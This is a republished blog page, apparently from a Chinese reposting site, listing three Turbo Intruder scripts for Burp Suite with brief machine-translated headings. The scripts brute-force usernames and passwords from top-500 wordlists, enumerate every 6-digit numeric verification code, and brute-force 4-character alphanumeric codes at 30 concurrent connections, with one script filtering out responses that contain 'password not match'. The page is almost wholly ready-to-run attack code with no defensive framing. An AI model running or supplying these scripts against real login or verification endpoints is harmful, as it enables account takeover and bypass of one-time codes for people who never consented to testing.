当前位置:网站首页>Turbo introder common scripts

Turbo introder common scripts

2022-07-07 23:21:00 b1ackc4t

Blasting user name and password

from urllib import quote
def user_password_brute(target, engine):
    for password in open("D:\\crypto\\mutou\\fuzzDicts\\passwordDict\\top500.txt"):
        for user in open("D:\\crypto\\mutou\\fuzzDicts\\userNameDict\\top500.txt"):
            engine.queue(target.req,[quote(user.rstrip()),quote(password.rstrip())])
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=False
                           )
    #user_brute(target,engine)
    #password_brute(target,engine)
    user_password_brute(target,engine)
def handleResponse(req, interesting):
    table.add(req)

Blast 6 Bit verification code

from itertools import product

def brute_veify_code(target, engine, length):
   pattern = '1234567890'
   for i in list(product(pattern, repeat=length)):
        code =  ''.join(i)
        engine.queue(target.req, code)

def queueRequests(target, wordlists):
   engine = RequestEngine(endpoint=target.endpoint,
           concurrentConnections=30,
           requestsPerConnection=100,
           pipeline=True
           )
   brute_veify_code(target, engine, 6)

def handleResponse(req, interesting):
# currently available attributes are req.status, req.wordcount, req.length and req.response
	table.add(req)

Burst code

from itertools import product

def brute_veify_code(target, engine, length):
   pattern = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
   for i in list(product(pattern, repeat=length)):
        code =  ''.join(i)
        engine.queue(target.req, code)

def queueRequests(target, wordlists):
   engine = RequestEngine(endpoint=target.endpoint,
           concurrentConnections=30,
           requestsPerConnection=100,
           pipeline=True
           )
   brute_veify_code(target, engine, 4)

def handleResponse(req, interesting):
# currently available attributes are req.status, req.wordcount, req.length and req.response
    if 'password not match' not in req.response:
        table.add(req)
原网站

版权声明
本文为[b1ackc4t]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/188/202207072030058491.html